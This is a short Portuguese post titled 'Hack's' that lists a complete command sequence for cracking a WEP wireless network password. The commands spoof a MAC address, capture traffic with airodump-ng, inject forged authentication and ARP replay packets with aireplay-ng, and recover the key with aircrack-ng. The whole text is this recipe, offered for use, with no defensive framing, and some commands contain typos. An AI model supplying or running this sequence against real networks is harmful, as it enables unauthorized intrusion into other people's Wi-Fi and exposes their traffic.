Hack's

Que de senha de rede wireless wep

# quebra de senha wep

airmon-ng

airmon-ng stop wlan0

ifconfig wlan0 down

macchange –mac 00:11:22:33:44:55 wlan0

airmon-ng start wlan0

airodump-ng wlan0

airodump-ng -c 11 -w wep123 –bsid (bssid) wlan0

___________________________________________________
outro console
___________________________________________________

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0

___________________________________________________
outro console
___________________________________________________

aircrack-ng -n 64 -b (bissd) wep123-01.cap

Standard